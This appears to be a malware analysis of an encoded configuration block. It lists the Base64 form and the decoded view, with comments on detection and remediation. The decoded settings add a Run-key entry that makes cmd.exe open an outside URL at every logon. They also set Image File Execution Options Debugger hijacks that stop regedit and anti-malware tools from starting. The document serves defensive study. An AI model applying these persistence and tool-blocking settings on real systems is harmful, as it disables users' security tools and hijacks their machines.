<!-- Every value attribute in this block is Base64-encoded, so a plain-text search of the file for registry paths or the URL finds nothing. Decode the values before extracting indicators; the decoded listing follows on this page. -->
- <appSettings>
<!-- Days decodes to 5. What the number controls is not shown on this page. -->
- <add key="Days" value="NQ=="/>
- <add key="RPath" value="U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu"/>
<!-- RPath2 to RPath15 share one long Base64 prefix because their plaintext starts with the same Image File Execution Options path. That shared prefix can serve as a static signature for this encoded form of the config. -->
- <add key="RPath2" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xyZWdlZGl0LmV4ZQ=="/>
- <add key="RPath3" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xhdnouZXhl"/>
- <add key="RPath4" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xDQ2xlYW5lci5leGU="/>
- <add key="RPath5" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xDQ2xlYW5lcjY0LmV4ZQ=="/>
- <add key="RPath6" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xSZWdXb3Jrcy5leGU="/>
- <add key="RPath7" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xBdXRvTG9nZ2VyLmV4ZQ=="/>
- <add key="RPath8" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xIaUphY2tUaGlzLmV4ZQ=="/>
- <add key="RPath9" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xBblZpci5leGU="/>
- <add key="RPath10" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xGUlNULmV4ZQ=="/>
- <add key="RPath11" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xGUlNUNjQuZXhl"/>
- <add key="RPath12" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xSU0lULmV4ZQ=="/>
- <add key="RPath13" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xSU0lUeDY0LmV4ZQ=="/>
- <add key="RPath14" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xhZHdjbGVhbmVyXzUuMDA1LmV4ZQ=="/>
- <add key="RPath15" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xtYmFtLmV4ZQ=="/>
<!-- NOTE(review): RName/RValue and RNameX/RValueX look like registry value name/data pairs for the paths above. The code that reads this block is not shown here, so confirm the pairing against the sample. -->
- <add key="RName" value="Q01E"/>
- <add key="RValue" value="Y21kLmV4ZSAvYyBzdGFydCBodHRwOi8vZ2FuZ25hbWdhbWUub3JnICYmIGV4aXQ="/>
- <add key="RNameX" value="RGVidWdnZXI="/>
- <add key="RValueX" value="c3ZjaG9zdC5leGU="/>
- </appSettings>
- After Base64-decoding every value attribute:
<!-- Decoded view of the configuration, for reading only. The raw ampersands in RValue would have to be written as &amp; for this to parse as well-formed XML. -->
- <appSettings>
<!-- Days: purpose not shown on this page (TODO confirm against the code that reads it). -->
- <add key="Days" value="5"/>
<!-- RPath is the Run key, whose entries Windows starts at logon (MITRE ATT&CK T1547.001). Presumably RName/RValue are written here as a value named CMD that has cmd.exe open the URL at each logon; the hive is not stated in the config. -->
- <add key="RPath" value="Software\Microsoft\Windows\CurrentVersion\Run"/>
<!-- RPath2 to RPath15 are Image File Execution Options subkeys, one per executable name: the registry editor plus what look like cleanup, diagnostic and anti-malware tools. Presumably RNameX/RValueX are written under each one. A Debugger value there makes Windows start the named program instead of the target image (MITRE ATT&CK T1546.012), so with svchost.exe as the debugger these tools fail to launch. -->
<!-- Detection: alert on registry value-set events (for example Sysmon Event ID 13) where the target path ends in Image File Execution Options\<image>\Debugger. Remediation: delete the Debugger values under these subkeys. Because the match is by image file name, a renamed copy of a blocked tool still runs. -->
- <add key="RPath2" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe"/>
- <add key="RPath3" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avz.exe"/>
- <add key="RPath4" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner.exe"/>
- <add key="RPath5" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe"/>
- <add key="RPath6" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegWorks.exe"/>
- <add key="RPath7" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutoLogger.exe"/>
- <add key="RPath8" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HiJackThis.exe"/>
- <add key="RPath9" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AnVir.exe"/>
- <add key="RPath10" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRST.exe"/>
- <add key="RPath11" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRST64.exe"/>
- <add key="RPath12" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RSIT.exe"/>
- <add key="RPath13" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RSITx64.exe"/>
- <add key="RPath14" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adwcleaner_5.005.exe"/>
- <add key="RPath15" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe"/>
<!-- NOTE(review): the pairing of RName/RValue with RPath, and of RNameX/RValueX with RPath2 to RPath15, is inferred from the key names and the decoded values. The consuming code is not shown here, so confirm it against the sample. -->
- <add key="RName" value="CMD"/>
- <add key="RValue" value="cmd.exe /c start http://gangnamgame.org && exit"/>
- <add key="RNameX" value="Debugger"/>
- <add key="RValueX" value="svchost.exe"/>
- </appSettings>